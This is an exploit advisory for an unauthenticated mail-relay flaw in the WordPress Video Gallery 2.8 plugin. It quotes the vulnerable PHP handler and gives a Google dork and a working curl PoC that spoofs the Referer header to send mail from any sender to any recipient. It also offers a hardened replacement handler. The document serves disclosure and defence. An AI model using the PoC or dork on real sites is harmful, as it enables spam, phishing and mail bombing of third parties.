######################
# Exploit Title : WordPress Video Gallery 2.8 Unprotected Mail Page
# Exploit Author : Claudio Viviani
# Website Author: http://www.homelab.it
#                 http://archive-exploit.homelab.it/1 (Full HomelabIT Vulns Archive)
# Vendor Homepage : http://www.apptha.com/category/extension/Wordpress/Video-Gallery
# Software Link : https://downloads.wordpress.org/plugin/contus-video-gallery.2.8.zip
# Dork Google: index of "contus-video-gallery"
# Date : 2015-04-05
# Tested on : Windows 7 / Mozilla Firefox
#             Linux / Mozilla Firefox
######################
# Description

WordPress Video Gallery 2.8 suffers from an unprotected mail page.

This vulnerability is exploitable for DoS, phishing, mail bombing, spam...

The "email" AJAX action is callable by any guest visitor (/contus-video-gallery/hdflvvideoshare.php):

/**
 * Email function
 */
add_action( 'wp_ajax_email', 'email_function' );
// The nopriv hook exposes the same handler to unauthenticated visitors.
add_action( 'wp_ajax_nopriv_email', 'email_function' );

function email_function() {
    require_once( dirname( __FILE__ ) . '/email.php' );
    die();
}

Any user can send email from /contus-video-gallery/email.php to any recipient.
The variables used to send emails are all taken from the POST body:

$to              = filter_input( INPUT_POST, 'to', FILTER_VALIDATE_EMAIL );
$from            = filter_input( INPUT_POST, 'from', FILTER_VALIDATE_EMAIL );
$url             = filter_input( INPUT_POST, 'url', FILTER_VALIDATE_URL );
$subject         = filter_input( INPUT_POST, 'Note', FILTER_SANITIZE_STRING );
$message_content = filter_input( INPUT_POST, 'Note', FILTER_SANITIZE_STRING );
$title           = filter_input( INPUT_POST, 'title', FILTER_SANITIZE_STRING );

$referrer      = parse_url( $_SERVER['HTTP_REFERER'] );
$referrer_host = $referrer['scheme'] . '://' . $referrer['host'];
$pageURL       = 'http';
// ... (the rest of the $pageURL construction is not reproduced in this advisory)

It assumes that if the provided "Referer" header matches the website's URL, then it is okay to send the email:

if ( $referrer_host === $pageURL ) {
    $headers  = "MIME-Version: 1.0" . "\r\n";
    $headers .= "Content-type:text/html;charset=UTF-8" . "\r\n";
    // The From / Reply-To / Return-path headers are all attacker-supplied.
    $headers .= "From: " . "<" . $from . ">\r\n";
    $headers .= "Reply-To: " . $from . "\r\n";
    $headers .= "Return-path: " . $from;

    $username = explode( '@', $from );
    $username = ucfirst( $username['0'] );
    $subject  = $username . ' has shared a video with you.';

    $emailtemplate_path = plugin_dir_url( __FILE__ ) . 'front/emailtemplate/Emailtemplate.html';
    $message = file_get_contents( $emailtemplate_path );
    $message = str_replace( '{subject}', $subject, $message );
    $message = str_replace( '{message}', $message_content, $message );
    $message = str_replace( '{videourl}', $url, $message );
    $message = str_replace( '{username}', $username, $message );

    if ( @mail( $to, $title, $message, $headers ) ) {
        echo 'success=sent';
    } else {
        echo 'success=error';
    }
} else {
    echo 'success=error';
}

The "Referer" header can easily be modified by the attacker!
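As an added example (not the plugin's code), a hardened replacement for the handler above: the handler is registered for logged-in users only, a WordPress nonce replaces the Referer check, sends are rate limited per user, and the sender identity comes from the site rather than from the request. The nonce action name 'cvg_share_email', the limit of 10 mails per hour and the restriction of the shared URL to this site are assumptions.

```php
<?php
// Added example, not the Video Gallery plugin's own code. Assumptions:
// nonce action 'cvg_share_email', 10 sends per user per hour, and the
// shared URL must point back to this site.

// No 'wp_ajax_nopriv_email' hook: guests cannot reach the handler at all.
add_action( 'wp_ajax_email', 'cvg_hardened_email_function' );

function cvg_hardened_email_function() {
    // 1. A nonce bound to the logged-in session replaces the Referer check;
    //    the Referer header is client-supplied and trivially spoofed.
    check_ajax_referer( 'cvg_share_email', 'nonce' );

    // 2. Capability gate: only users allowed to read content may share it.
    if ( ! current_user_can( 'read' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // 3. Per-user rate limit kept in a transient, so a single account
    //    cannot be turned into a mail-bombing relay.
    $key   = 'cvg_share_' . get_current_user_id();
    $count = (int) get_transient( $key );
    if ( $count >= 10 ) {
        wp_send_json_error( 'rate limited', 429 );
    }
    set_transient( $key, $count + 1, HOUR_IN_SECONDS );

    // 4. Validate inputs; the caller never chooses the From address.
    $to   = isset( $_POST['to'] )   ? sanitize_email( wp_unslash( $_POST['to'] ) )           : '';
    $url  = isset( $_POST['url'] )  ? esc_url_raw( wp_unslash( $_POST['url'] ) )             : '';
    $note = isset( $_POST['Note'] ) ? sanitize_textarea_field( wp_unslash( $_POST['Note'] ) ) : '';
    if ( ! is_email( $to ) || $url === '' || 0 !== strpos( $url, home_url() ) ) {
        wp_send_json_error( 'invalid input', 400 );
    }

    // 5. Sender identity and subject come from the site's own user record.
    $user    = wp_get_current_user();
    $subject = sprintf( '%s has shared a video with you.', $user->display_name );
    $body    = sprintf( "%s\n\n%s\n\n%s", $subject, $note, $url );
    $headers = array( 'Reply-To: ' . $user->user_email );

    if ( wp_mail( $to, $subject, $body, $headers ) ) {
        wp_send_json_success( 'sent' );
    }
    wp_send_json_error( 'mail failed', 500 );
}
```

The matching nonce is issued to the page's JavaScript with wp_create_nonce( 'cvg_share_email' ) and sent back as the "nonce" POST field.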
######################
# PoC

curl -X POST -d "from=attacker@attacker.com&to=victim@victim.com&Note=BodyMessage&title=Subject&url=http://www.homelab.it" \
  -e http://127.0.0.1 http://127.0.0.1/wp-admin/admin-ajax.php?action=email

The cURL switch "-e" sets a spoofed Referer header.

# Http Response

success=sent

# PoC Video

http://youtu.be/qgOGPm1-tNc

#######################
Discovered By : Claudio Viviani

http://www.homelab.it
http://archive-exploit.homelab.it/1 (Full HomelabIT Archive Exploit)
http://ffhd.homelab.it (Free Fuzzy Hashes Database)

info@homelab.it
homelabit@protonmail.ch

https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
#####################